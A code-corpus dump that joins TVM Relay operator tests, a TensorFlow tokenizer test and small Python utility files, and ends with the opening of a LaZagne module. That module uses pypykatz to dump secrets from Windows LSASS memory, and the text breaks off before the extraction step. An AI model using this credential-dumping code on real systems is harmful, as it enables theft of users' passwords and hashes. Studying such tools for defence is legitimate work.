op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def _test_global_pool2d(opfunc, reffunc):
n, c, h, w = tvm.size_var("n"), tvm.size_var("c"), 224, 224
x = relay.var("x", relay.TensorType((n, h, w, c), "float32"))
y = opfunc(x, layout="NHWC")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 1, 1, c), "float32")
n, c, h, w = tvm.size_var("n"), tvm.size_var("c"), tvm.size_var("h"), tvm.size_var("w")
x = relay.var("x", relay.TensorType((n, c, h, w), "float32"))
y = opfunc(x)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, 1, 1), "float32")
# test execution
dtype = "float32"
dshape = (1, 1024, 7, 7)
x = relay.var("x", shape=dshape)
y = opfunc(x)
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = reffunc(data, axis=(2,3), keepdims=True)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def test_pool2d():
_test_pool2d(relay.nn.max_pool2d, np.max)
_test_pool2d(relay.nn.avg_pool2d, np.mean)
_test_pool2d_int(relay.nn.avg_pool2d, np.mean, 'int32')
_test_pool2d_int(relay.nn.avg_pool2d, np.mean, 'uint16')
_test_global_pool2d(relay.nn.global_max_pool2d, np.max)
_test_global_pool2d(relay.nn.global_avg_pool2d, np.mean)
def test_pool1d():
def _test_pool1d(opfunc):
n, c, w = tvm.var("n"), 10, 224
x = relay.var("x", relay.TensorType((n, c, w), "float32"))
y = opfunc(x, pool_size=(1,))
assert "pool_size=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 10, 224), "float32")
# test execution
dtype = "float32"
dshape = (1, 3, 32)
x = relay.var("x", shape=dshape)
pool_type = 'max' if 'max' in str(opfunc) else 'avg'
y = opfunc(x, pool_size=(2,), strides=(2,), padding=(0, 0))
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = topi.testing.pool1d_ncw_python(data, (2,), (2,),
(0, 0), (1, 3, 16), pool_type, False)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
_test_pool1d(relay.nn.max_pool1d)
_test_pool1d(relay.nn.avg_pool1d)
def test_pool3d():
def _test_pool3d(opfunc, padding=(0, 0, 0, 0, 0, 0), out_shape=(1, 3, 16, 16, 16)):
n, c, d, h, w = tvm.size_var("n"), 10, 5, 224, 224
x = relay.var("x", relay.TensorType((n, c, d, h, w), "float32"))
y = opfunc(x, pool_size=(1, 1, 1))
assert "pool_size=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 10, 5, 224, 224), "float32")
# test execution
dtype = "float32"
dshape = (1, 3, 32, 32, 32)
x = relay.var("x", shape=dshape)
pool_type = 'max' if 'max' in str(opfunc) else 'avg'
y = opfunc(x, pool_size=(2, 2, 2), strides=(2, 2, 2), padding=padding)
func = relay.Function([x], y)
# check output shape
f_out_shape = tuple(map(lambda x: int(x), run_infer_type(func).ret_type.shape))
assert out_shape == f_out_shape, \
"Output shape mismatch. expected {}, actual {}".format(out_shape, f_out_shape)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = topi.testing.pool3d_ncdhw_python(data, (2, 2, 2), (2, 2, 2),
padding, out_shape, pool_type, False)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
_test_pool3d(relay.nn.max_pool3d)
_test_pool3d(relay.nn.max_pool3d, padding=(2, 0, 0, 2, 0, 0), out_shape=(1, 3, 18, 16, 16))
_test_pool3d(relay.nn.max_pool3d, padding=(0, 3, 0, 0, 3, 0), out_shape=(1, 3, 16, 19, 16))
_test_pool3d(relay.nn.max_pool3d, padding=(0, 0, 4, 0, 0, 4), out_shape=(1, 3, 16, 16, 20))
_test_pool3d(relay.nn.avg_pool3d)
_test_pool3d(relay.nn.avg_pool3d, padding=(2, 0, 0, 2, 0, 0), out_shape=(1, 3, 18, 16, 16))
_test_pool3d(relay.nn.avg_pool3d, padding=(0, 3, 0, 0, 3, 0), out_shape=(1, 3, 16, 19, 16))
_test_pool3d(relay.nn.avg_pool3d, padding=(0, 0, 4, 0, 0, 4), out_shape=(1, 3, 16, 16, 20))
def test_avg_pool2d_no_count_pad():
kh, kw = (4, 4)
sh, sw = (2, 2)
ph, pw = (2, 2)
n = 1
(ic, ih, iw) = (3, 28, 28)
(oc, oh, ow) = (3, 15, 15)
dshape = (n, ic, ih, iw)
x = relay.var("x", shape=dshape)
y = relay.nn.avg_pool2d(x,
pool_size=(kh, kw),
strides=(sw, sw),
padding=(ph, pw),
count_include_pad=False)
func = relay.Function([x], y)
dtype = "float32"
a_np = np.random.uniform(low=0.001, size=(n, ic, ih, iw)).astype(dtype)
pad_np = np.zeros(shape=(n, ic, ih+2*ph, iw+2*pw)).astype(dtype)
no_zero = (range(n), range(ic), (range(ph, ih+ph)), (range(pw, iw+pw)))
pad_np[np.ix_(*no_zero)] = a_np
b_np = np.zeros(shape=(n, oc, oh, ow)).astype(dtype)
for i in range(oh):
for j in range(ow):
pad_count = np.sum(pad_np[:, :, i*sh:i*sh+kh, j*sw:j*sw+kw] > 0, axis=(2,3))
b_np[:,:,i,j] = np.sum(pad_np[:, :, i*sh:i*sh+kh, j*sw:j*sw+kw],
axis=(2,3)) / np.maximum(pad_count, 1)
ref_res = np.maximum(b_np, 0.0)
data = a_np
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def test_flatten_infer_type():
d1, d2, d3, d4 = tvm.size_var("d1"), tvm.size_var("d2"), tvm.size_var("d3"), tvm.size_var("d4")
x = relay.var("x", relay.TensorType((d1, d2, d3, d4), "float32"))
y = relay.nn.batch_flatten(x)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((d1, ((d2*d3)*d4)), "float32")
x = relay.var("x", relay.TensorType((3, 2, 4, 3), "float32"))
y = relay.nn.batch_flatten(x)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((3, 24), "float32")
x = relay.var("x", relay.TensorType((d1, 2, d3, 3), "float32"))
y = relay.nn.batch_flatten(x)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((d1, ((2*d3)*3)), "float32")
shape = (1, 5, 10, 10)
o_shape = (1, 500)
dtype = "float32"
x = relay.var("x", relay.TensorType(shape, dtype))
z = relay.nn.batch_flatten(x)
yy = run_infer_type(z)
assert yy.checked_type == relay.TensorType(o_shape, dtype)
func = relay.Function([x], z)
x_data = np.random.uniform(low=-1, high=1, size=shape).astype(dtype)
ref_res = x_data.flatten().reshape(o_shape)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
intrp2 = relay.create_executor("debug", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5)
op_res2 = intrp2.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res2.asnumpy(), ref_res, rtol=1e-5)
def test_pad_infer_type():
# entirely concrete case
n, c, h, w = 1, 2, 3, 4
t = relay.var("t", relay.TensorType((n, c, h, w), "float32"))
y = relay.nn.pad(t, ((1, 1), (2, 2), (3, 3), (4, 4)))
"pad_width=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((3, 6, 9, 12), "float32")
# some symbolic values
n, c, h, w = tvm.size_var("n"), 2, 3, tvm.size_var("w")
t = relay.var("t", relay.TensorType((n, c, h, w), "float32"))
y = relay.nn.pad(t, ((1, 1), (2, 2), (3, 3), (4, 4)))
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n + 2, 6, 9, w + 8), "float32")
def test_pad_run():
def _test_run(dtype):
dshape = (4, 10, 7, 7)
x = relay.var("x", shape=dshape)
y = relay.nn.pad(x, ((1, 1), (2, 2), (3, 3), (4, 4)))
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = np.pad(data, ((1, 1), (2, 2), (3, 3), (4, 4)), 'constant')
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
_test_run('float32')
_test_run('int32')
def test_lrn():
n, c , h, w = tvm.size_var("n"), tvm.size_var("c"), tvm.size_var("h"), tvm.size_var("w")
x = relay.var("x", shape=(n, c , h, w))
y = relay.nn.lrn(x, size=10, axis=2, bias=0.5, alpha=.00001, beta=0.75)
"alpha=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c , h, w))
shape = (1, 5, 10, 10)
dtype = "float32"
x = relay.var("x", relay.TensorType(shape, dtype))
size=5
axis=1
bias=0.5
alpha=.00001
beta=0.75
z = relay.nn.lrn(x, size=size, axis=axis, bias=bias, alpha=alpha, beta=beta)
yy = run_infer_type(z)
assert yy.checked_type == relay.TensorType(shape, dtype)
func = relay.Function([x], z)
x_data = np.random.uniform(low=-1, high=1, size=shape).astype(dtype)
ref_res = topi.testing.lrn_python(x_data, size, axis, bias, alpha, beta)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
intrp2 = relay.create_executor("debug", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5)
op_res2 = intrp2.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res2.asnumpy(), ref_res, rtol=1e-5)
def test_l2_normalize():
n, c , h, w = tvm.size_var("n"), tvm.size_var("c"), tvm.size_var("h"), tvm.size_var("w")
x = relay.var("x", shape=(n, c , h, w))
y = relay.nn.l2_normalize(x, eps=0.001, axis=[1])
"axis=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c , h, w))
shape = (1, 5, 10, 10)
dtype = "float32"
x = relay.var("x", relay.TensorType(shape, dtype))
eps=0.001
axis=1
z = relay.nn.l2_normalize(x, eps=0.001, axis=[axis])
yy = run_infer_type(z)
assert yy.checked_type == relay.TensorType(shape, dtype)
func = relay.Function([x], z)
x_data = np.random.uniform(low=-1, high=1, size=shape).astype(dtype)
ref_res = topi.testing.l2_normalize_python(x_data, eps, axis)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
intrp2 = relay.create_executor("debug", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5)
op_res2 = intrp2.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res2.asnumpy(), ref_res, rtol=1e-5)
def batch_flatten(data):
shape = data.shape
target_dim = 1
for i in range(len(shape) - 1):
target_dim = target_dim * shape[i + 1]
return np.reshape(data, (shape[0], target_dim))
def test_batch_flatten():
t1 = relay.TensorType((5, 10, 5))
x = relay.Var("x", t1)
func = relay.Function([x], relay.nn.batch_flatten(x))
data = np.random.rand(5, 10, 5).astype(t1.dtype)
ref_res = batch_flatten(data)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(data)
np.testing.assert_allclose(op_res.asnumpy(), ref_res, rtol=0.01)
def _test_upsampling(layout, method, align_corners=False):
n, c, h, w = tvm.size_var("n"), 16, 32, 32
scale_h = 2.0
scale_w = 2.0
dtype = "float32"
def get_shape():
if layout == "NCHW":
return (c, h, w), (c, int(round(h*scale_h)), int(round(w*scale_w)))
else:
return (h, w, c), (int(round(h*scale_h)), int(round(w*scale_w)), c)
ishape, oshape = get_shape()
x = relay.var("x", relay.TensorType((n,) + ishape, dtype))
y = relay.nn.upsampling(x, scale_h=scale_h, scale_w=scale_w, layout=layout,
method=method, align_corners=align_corners)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n,) + oshape, dtype)
dshape = (1,) + ishape
x = relay.var("x", shape=dshape)
y = relay.nn.upsampling(x, scale_h=scale_h, scale_w=scale_w, layout=layout,
method=method, align_corners=align_corners)
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
if method == "nearest_neighbor":
ref = topi.testing.upsampling_python(data, (scale_h, scale_w), layout)
else:
ref = topi.testing.bilinear_resize_python(data, (int(round(h*scale_h)),
int(round(w*scale_w))), layout)
for target, ctx in ctx_list():
executor = relay.create_executor("graph", ctx=ctx, target=target)
out = executor.evaluate(func)(data)
tvm.testing.assert_allclose(out.asnumpy(), ref, rtol=1e-5, atol=1e-5)
def test_upsampling():
_test_upsampling("NCHW", "nearest_neighbor")
_test_upsampling("NCHW", "bilinear", True)
_test_upsampling("NHWC", "nearest_neighbor")
_test_upsampling("NHWC", "bilinear", True)
def _test_upsampling3d(layout, method, coordinate_transformation_mode="half_pixel"):
n, c, d, h, w = tvm.size_var("n"), 8, 16, 16, 16
scale_d = 2.0
scale_h = 2.0
scale_w = 2.0
dtype = "float32"
def get_shape():
if layout == "NCDHW":
return (c, d, h, w), (c, int(round(d*scale_d)), int(round(h*scale_h)),\
int(round(w*scale_w)))
else:
return (d, h, w, c), (int(round(d*scale_d)), int(round(h*scale_h)),\
int(round(w*scale_w)), c)
ishape, oshape = get_shape()
x = relay.var("x", relay.TensorType((n,) + ishape, dtype))
y = relay.nn.upsampling3d(x, scale_d=scale_d, scale_h=scale_h, scale_w=scale_w,\
layout=layout, method=method,\
coordinate_transformation_mode=coordinate_transformation_mode)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n,) + oshape, dtype)
dshape = (1,) + ishape
x = relay.var("x", shape=dshape)
y = relay.nn.upsampling3d(x, scale_d=scale_d, scale_h=scale_h, scale_w=scale_w,\
layout=layout, method=method,\
coordinate_transformation_mode=coordinate_transformation_mode)
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
if method == "nearest_neighbor":
ref = topi.testing.upsampling3d_python(data, (scale_d, scale_h, scale_w), layout)
else:
ref = topi.testing.trilinear_resize3d_python(data, (int(round(d*scale_d)),\
int(round(h*scale_h)),\
int(round(w*scale_w))), layout)
for target, ctx in ctx_list():
executor = relay.create_executor("graph", ctx=ctx, target=target)
out = executor.evaluate(func)(data)
tvm.testing.assert_allclose(out.asnumpy(), ref, rtol=1e-5, atol=1e-5)
def test_upsampling3d():
_test_upsampling3d("NCDHW", "nearest_neighbor")
_test_upsampling3d("NCDHW", "trilinear", "align_corners")
_test_upsampling3d("NDHWC", "nearest_neighbor")
_test_upsampling3d("NDHWC", "trilinear", "align_corners")
def test_conv2d_int8_intrinsics():
def _compile(ic, oc, target, data_layout, kernel_layout, dtypes):
input_dtype, weight_dtype, output_dtype = dtypes
n, h, w, ch, cw = 1, 64, 64, 3, 3
if data_layout == 'NCHW':
data_shape = (n, ic, h, w)
x = relay.var("x", relay.TensorType(data_shape, input_dtype))
elif data_layout == 'NHWC':
data_shape = (n, h, w, ic)
x = relay.var("x", relay.TensorType(data_shape, input_dtype))
else:
raise ValueError('Not supported')
if kernel_layout == 'OIHW':
kernel_shape = (oc, ic, ch, cw)
elif kernel_layout == 'HWIO':
kernel_shape = (ch, cw, ic, oc)
else:
raise ValueError('Not supported')
weight = relay.var("weight", relay.TensorType(kernel_shape, weight_dtype))
y = relay.nn.conv2d(x, weight,
kernel_size=(ch, cw),
channels=oc,
padding=(1, 1),
dilation=(1, 1),
data_layout=data_layout,
kernel_layout=kernel_layout,
out_dtype=output_dtype)
func = relay.Function([x, weight], y)
wdata = np.random.rand(*kernel_shape) * 10
parameters = {"weight": tvm.nd.array(wdata.astype(weight_dtype))}
with relay.build_config(opt_level=3):
graph, lib, params = relay.build(func, target, params=parameters)
assembly = lib.get_source("asm")
return assembly
def _has_fast_int8_instructions(asm, target):
if 'skylake-avx512' in target:
return "pmaddubs" in asm
elif 'cascadelake' in target:
return "vpdpbusd" in asm
else:
assert False, "Target should be Skylake or Cascadelake"
# compile conv2d for x86 (skylake, cascadelake) and test assembly contains *pmadd* instructions
targets = ["llvm -mcpu=skylake-avx512", "llvm -mcpu=cascadelake"]
llvm_version = tvm.codegen.llvm_version_major()
for target in targets:
if llvm_version >= 8:
dtypes = ('uint8', 'int8', 'int32')
# Sweep the input channels to check int8 robustness
# Input channels should be a multiple of 4 internally.
for ic in [1, 4, 6]:
asm = _compile(ic=ic, oc=16, target=target, data_layout="NCHW",
kernel_layout='OIHW',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
for ic in [1, 4, 6]:
asm = _compile(ic=ic, oc=16, target=target, data_layout="NHWC",
kernel_layout='HWIO',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
# Sweep the output channels to check int8 robustness
# Output channels should be a multiple of 16 internally.
for oc in [4, 16, 20]:
asm = _compile(ic=8, oc=oc, target=target, data_layout="NCHW",
kernel_layout='OIHW',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
for oc in [4, 16, 20]:
asm = _compile(ic=8, oc=oc, target=target, data_layout="NHWC",
kernel_layout='HWIO',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
# Check that both non-divisible oc and ic work
asm = _compile(ic=17, oc=29, target=target, data_layout="NCHW", kernel_layout='OIHW',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
asm = _compile(ic=17, oc=29, target=target, data_layout="NHWC", kernel_layout='HWIO',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
# Check that int8 x int8 goes through legalization so that fast instructions can be picked up.
for target in targets:
if llvm_version >= 8:
dtypes = (('int8', 'int8', 'int32'))
# Check that both non-divisible oc and ic work
asm = _compile(ic=17, oc=29, target=target, data_layout="NCHW", kernel_layout='OIHW',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
asm = _compile(ic=17, oc=29, target=target, data_layout="NHWC", kernel_layout='HWIO',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
# Ensure that code is generated when datatypes are not HW supported.
dtypes = ('uint8', 'uint8', 'int32')
asm = _compile(ic=16, oc=32, target=target, data_layout="NHWC", kernel_layout='HWIO',
dtypes=dtypes)
        # Check that the intrinsic is not present in the assembly.
assert not _has_fast_int8_instructions(asm, target)
# Check that a vectorized instruction is generated for older Intel
# generations, because we default to NCHWc layout.
target = "llvm -mcpu=core-avx2"
fast_int8_dtypes = ('uint8', 'int8', 'int32')
asm = _compile(ic=16, oc=32, target=target, data_layout="NCHW", kernel_layout='OIHW',
dtypes=fast_int8_dtypes)
# Check that vector int mult and add instructions are generated.
assert "vpmulld" in asm and "vpadd" in asm
def test_depthwise_conv2d_int8():
input_dtype = 'uint8'
weight_dtype = 'int8'
output_dtype = 'int32'
data_shape = (1, 64, 56, 56)
x = relay.var("x", relay.TensorType(data_shape, input_dtype))
kernel_shape = (64, 1, 3, 3)
weight = relay.var("weight", relay.TensorType(kernel_shape, weight_dtype))
y = relay.nn.conv2d(x, weight,
kernel_size=(3, 3),
groups=64,
padding=(1, 1),
dilation=(1, 1),
out_dtype=output_dtype)
func = relay.Function([x, weight], y)
wdata = np.random.rand(*kernel_shape) * 10
parameters = {"weight": tvm.nd.array(wdata.astype(weight_dtype))}
targets = ["llvm -mcpu=skylake-avx512", "llvm -mcpu=cascadelake"]
llvm_version = tvm.codegen.llvm_version_major()
for target in targets:
if llvm_version >= 8:
with relay.build_config(opt_level=3):
graph, lib, params = relay.build(func, target, params=parameters)
def test_bitserial_conv2d_infer_type():
# Basic shape test with ambiguous batch.
n, c, h, w = tvm.size_var("n"), 32, 224, 224
x = relay.var("x", relay.ty.TensorType((n, c, h, w), "int16"))
w = relay.var("w", relay.ty.TensorType((32, 32, 3, 3), "int16"))
y = relay.nn.bitserial_conv2d(
x, w, kernel_size=(3, 3), padding=(0, 0), channels=32)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 32, 222, 222), "int16")
def test_bitpack_infer_type():
# Test axis packing shape inference.
o, i, h, w = 32, 32, 128, 128
x = relay.var("x", relay.ty.TensorType((o, i, h, w), "int16"))
y = relay.nn.bitpack(x, bit_axis=4, pack_axis=1, pack_type='uint16', bits=1)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(32, 2, 128, 128, 1), "uint16")
if __name__ == "__main__":
test_pool1d()
test_pool2d()
test_pool3d()
test_avg_pool2d_no_count_pad()
test_lrn()
test_l2_normalize()
test_conv1d_infer_type()
test_conv2d_infer_type()
test_conv3d_infer_type()
test_bitpack_infer_type()
test_upsampling_infer_type()
test_upsampling3d_infer_type()
test_flatten_infer_type()
test_pad_infer_type()
test_pad_run()
test_conv2d_transpose_infer_type()
test_conv2d_transpose_nchw_run()
test_conv2d_transpose_nhwc_run()
test_conv1d_transpose_ncw_run()
test_conv1d_run()
test_conv2d_run()
test_conv2d_winograd()
test_conv3d_run()
test_conv3d_ndhwc_run()
test_bitserial_conv2d_infer_type()
test_batch_flatten()
test_upsampling()
test_upsampling3d()
test_conv2d_int8_intrinsics()
test_depthwise_conv2d_int8()
| 1.703125 | 2 |
official/nlp/transformer/utils/tokenizer_test.py | hjkim-haga/TF-OD-API | 1 | 1150 | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Subtokenizer and string helper methods."""
import collections
import tempfile
import tensorflow as tf
from official.nlp.transformer.utils import tokenizer
class SubtokenizerTest(tf.test.TestCase):
def _init_subtokenizer(self, vocab_list):
temp_file = tempfile.NamedTemporaryFile(delete=False)
with tf.io.gfile.GFile(temp_file.name, "w") as w:
for subtoken in vocab_list:
w.write("'%s'" % subtoken)
w.write("\n")
return tokenizer.Subtokenizer(temp_file.name, reserved_tokens=[])
def test_encode(self):
vocab_list = ["123_", "test", "ing_"]
subtokenizer = self._init_subtokenizer(vocab_list)
s = "testing 123"
encoded_list = subtokenizer.encode(s)
self.assertEqual([1, 2, 0], encoded_list)
def test_decode(self):
vocab_list = ["123_", "test", "ing_"]
subtokenizer = self._init_subtokenizer(vocab_list)
encoded_list = [1, 2, 0] # testing 123
decoded_str = subtokenizer.decode(encoded_list)
self.assertEqual("testing 123", decoded_str)
def test_subtoken_ids_to_tokens(self):
vocab_list = ["123_", "test", "ing_"]
subtokenizer = self._init_subtokenizer(vocab_list)
encoded_list = [1, 2, 0] # testing 123
token_list = subtokenizer._subtoken_ids_to_tokens(encoded_list)
self.assertEqual([u"testing", u"123"], token_list)
class StringHelperTest(tf.test.TestCase):
def test_split_string_to_tokens(self):
text = "test? testing 123."
tokens = tokenizer._split_string_to_tokens(text,
tokenizer._ALPHANUMERIC_CHAR_SET)
self.assertEqual(["test", "? ", "testing", "123", "."], tokens)
def test_join_tokens_to_string(self):
tokens = ["test", "? ", "testing", "123", "."]
s = tokenizer._join_tokens_to_string(tokens,
tokenizer._ALPHANUMERIC_CHAR_SET)
self.assertEqual("test? testing 123.", s)
def test_escape_token(self):
token = u"abc_\\4"
alphabet = set("abc_\\u;")
escaped_token = tokenizer._escape_token(token, alphabet)
self.assertEqual("abc\\u\\\\\\52;_", escaped_token)
def test_unescape_token(self):
escaped_token = u"Underline: \\u, Backslash: \\\\, Unicode: \\52;"
unescaped_token = tokenizer._unescape_token(escaped_token)
self.assertEqual("Underline: _, Backslash: \\, Unicode: 4", unescaped_token)
def test_list_to_index_dict(self):
lst = ["test", "strings"]
d = tokenizer._list_to_index_dict(lst)
self.assertDictEqual({"test": 0, "strings": 1}, d)
def test_split_token_to_subtokens(self):
token = "abc"
subtoken_dict = {"a": 0, "b": 1, "c": 2, "ab": 3}
max_subtoken_length = 2
subtokens = tokenizer._split_token_to_subtokens(token, subtoken_dict,
max_subtoken_length)
self.assertEqual(["ab", "c"], subtokens)
def test_generate_alphabet_dict(self):
s = ["testing", "123"]
reserved_tokens = ["???"]
alphabet = tokenizer._generate_alphabet_dict(s, reserved_tokens)
self.assertIn("?", alphabet)
self.assertIn("t", alphabet)
self.assertIn("e", alphabet)
self.assertIn("s", alphabet)
self.assertIn("i", alphabet)
self.assertIn("n", alphabet)
self.assertIn("g", alphabet)
self.assertIn("1", alphabet)
self.assertIn("2", alphabet)
self.assertIn("3", alphabet)
def test_count_and_gen_subtokens(self):
token_counts = {"abc": 5}
alphabet = set("abc_")
subtoken_dict = {"a": 0, "b": 1, "c": 2, "_": 3}
max_subtoken_length = 2
subtoken_counts = tokenizer._count_and_gen_subtokens(
token_counts, alphabet, subtoken_dict, max_subtoken_length)
self.assertIsInstance(subtoken_counts, collections.defaultdict)
self.assertDictEqual(
{
"a": 5,
"b": 5,
"c": 5,
"_": 5,
"ab": 5,
"bc": 5,
"c_": 5,
"abc": 5,
"bc_": 5,
"abc_": 5
}, subtoken_counts)
def test_filter_and_bucket_subtokens(self):
subtoken_counts = collections.defaultdict(int, {
"a": 2,
"b": 4,
"c": 1,
"ab": 6,
"ac": 3,
"abbc": 5
})
min_count = 3
subtoken_buckets = tokenizer._filter_and_bucket_subtokens(
subtoken_counts, min_count)
self.assertEqual(len(subtoken_buckets[0]), 0)
self.assertEqual(set("b"), subtoken_buckets[1])
self.assertEqual(set(["ab", "ac"]), subtoken_buckets[2])
self.assertEqual(len(subtoken_buckets[3]), 0)
self.assertEqual(set(["abbc"]), subtoken_buckets[4])
def test_gen_new_subtoken_list(self):
subtoken_counts = collections.defaultdict(int, {
"translate": 10,
"t": 40,
"tr": 16,
"tra": 12
})
min_count = 5
alphabet = set("translate")
reserved_tokens = ["reserved", "tokens"]
subtoken_list, max_token_length = tokenizer._gen_new_subtoken_list(
subtoken_counts, min_count, alphabet, reserved_tokens)
# Check that "tra" isn"t in the list (its count should be decremented to 2,
# so it should not be added to the canddiate list).
self.assertNotIn("tra", subtoken_list)
self.assertIn("tr", subtoken_list)
self.assertIn("t", subtoken_list)
self.assertEqual(len("translate"), max_token_length)
def test_generate_subtokens(self):
token_counts = {"ab": 1, "bc": 3, "abc": 5}
alphabet = set("abc_")
min_count = 100
num_iterations = 1
reserved_tokens = ["reserved", "tokens"]
vocab_list = tokenizer._generate_subtokens(token_counts, alphabet,
min_count, num_iterations,
reserved_tokens)
# Check that reserved tokens are at the front of the list
self.assertEqual(vocab_list[:2], reserved_tokens)
# Check that each character in alphabet is in the vocab list
for c in alphabet:
self.assertIn(c, vocab_list)
if __name__ == "__main__":
tf.test.main()
| 2.515625 | 3 |
api/api/form7_searching_utils/__init__.py | bcgov/court-of-appeal | 0 | 1151 | <filename>api/api/form7_searching_utils/__init__.py
from .form7_search import Form7Search
from .parse_form7 import Form7Parsing
| 1.09375 | 1 |
soil/build/lib/soil/openstack/snapshot.py | JackDan9/soil | 1 | 1152 | <gh_stars>1-10
# Copyright 2020 Soil, Inc.
from soil.openstack.base import DataBase
from soil.openstack.base import SourceBase
class SnapshotData(DataBase):
"""A class for openstack snapshot data"""
def __init__(self, data):
self.data = data['snapshot']
class Snapshot(SourceBase):
"""A class for openstack snapshot"""
def __init__(self, plugin, source_id):
super(Snapshot, self).__init__(plugin, source_id)
self._snapshot_obj = None
@property
def snapshot_obj(self):
if self._snapshot_obj is not None:
return self._snapshot_obj
self._snapshot_obj = SnapshotData(self.show())
return self._snapshot_obj
def show(self):
return self.plugin.cinder.show_snapshot(self.source_id)
def delete(self):
self.plugin.cinder.delete_snapshot(self.source_id)
def is_created(self):
snapshot_info = self.show()
status = snapshot_info['snapshot']['status']
if status in ('available', ):
return True
self._check_failed_status(status)
return False
def is_delete(self):
pass
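# Illustrative usage (added sketch, not part of the original module): `plugin`
# is assumed to be an initialized Soil plugin object exposing a `cinder` client.
#
#     snapshot = Snapshot(plugin, source_id)
#     while not snapshot.is_created():   # poll until Cinder reports "available"
#         time.sleep(5)
#     snapshot.delete()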
| 2.390625 | 2 |
Z - Tool Box/LaZagne/Windows/lazagne/softwares/windows/ppypykatz.py | dfirpaul/Active-Directory-Exploitation-Cheat-Sheet-1 | 1,290 | 1153 | # -*- coding: utf-8 -*-
# Thanks to @skelsec for his awesome tool Pypykatz
# Checks his project here: https://github.com/skelsec/pypykatz
import codecs
import traceback
from lazagne.config.module_info import ModuleInfo
from lazagne.config.constant import constant
from pypykatz.pypykatz import pypykatz
class Pypykatz(ModuleInfo):
"""
Pypykatz dumps all secrets from the lsass.exe memory
It does not work if:
- LSASS is running as a protected process
- A security product blocks this access
"""
def __init__(self):
ModuleInfo.__init__(self, 'pypykatz', 'windows', system_module=True)
def run(self):
mimi = None
try:
mimi = pypykatz.go_live()
except Exception:
self.debug(traceback.format_exc())
if mimi:
results = {}
logon_sessions = mimi.to_dict().get('logon_sessions', [])
for logon_session in logon_sessions:
# Right now kerberos_creds, dpapi_creds results are not used
user = logon_sessions[logon_session]
# Get cleartext password
